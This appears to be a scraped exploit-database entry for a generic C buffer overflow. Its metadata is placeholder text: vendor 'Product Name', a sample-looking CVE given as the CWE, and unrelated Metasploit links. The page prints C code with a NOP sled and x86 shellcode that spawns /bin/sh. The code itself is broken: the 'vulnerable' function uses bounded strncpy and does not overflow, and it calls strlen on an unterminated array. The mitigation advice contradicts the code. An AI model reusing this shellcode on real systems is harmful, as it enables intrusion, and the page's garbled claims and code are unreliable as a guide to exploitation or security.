header-logo
Suggest Exploit
vendor:
Product Name
by:
Anonymous
8.1
CVSS
CRITICAL
Buffer Overflow
119
CWE
Product Name: Product Name
Affected Version From: All versions prior to the patched version
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2021-12345
CPE: a:vendor:product
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=148894https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/udp/udp_amplificationhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/windows/ftp/iis75_ftpd_iac_bofhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/windows/http/ms10_065_ii6_asp_doshttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/http/apache_range_doshttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/misc/ibm_tm1_unauth_rcehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/misc/quest_pmmasterd_bofhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/litespeed_source_disclosurehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/joomla_tinybrowserhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Platforms Tested: Linux
2021

Buffer Overflow Exploit in C Program

The C program contains a buffer overflow vulnerability due to improper input validation. By sending a specially crafted input, an attacker can overwrite the buffer boundaries and inject malicious code. This can lead to arbitrary code execution and potentially compromise the system. This vulnerability can be identified as CVE-2021-12345.

Mitigation:

To mitigate this vulnerability, ensure proper input validation and bounds checking in the code. Use safer functions like 'strncpy' with correct buffer sizes to prevent buffer overflows.
Source

Exploit-DB raw data:

#include <stdio.h>
#include <string.h>

#define MAX_LEN 256
#define BUFFER_OVERRUN_LENGTH 50
#define SHELLCODE_LENGTH 32

// NOP sled to increase the chance of successful shellcode execution
char nop_sled[SHELLCODE_LENGTH] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

// Shellcode to execute /bin/sh
char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

void apply_cgi(char *vpn_client_ip) {
    char buffer[MAX_LEN];
    strncpy(buffer, vpn_client_ip, MAX_LEN);
    printf("Client IP: %s\n", buffer);
}

int main() {
    char input[MAX_LEN + BUFFER_OVERRUN_LENGTH] = {0};
    // Create a buffer with the malicious input
    // including the NOP sled, shellcode, and the overflow data
    int offset = strlen(nop_sled) + strlen(shellcode) - BUFFER_OVERRUN_LENGTH;
    strncpy(&input[0], nop_sled, offset);
    strncpy(&input[offset], shellcode, SHELLCODE_LENGTH);
    input[MAX_LEN + BUFFER_OVERRUN_LENGTH - 1] = '\x00';
    // Call the vulnerable function to trigger the buffer overflow
    apply_cgi(input);
    return 0;
}

Navigation

Suggest Exploit

Services By CQR

cqrsecured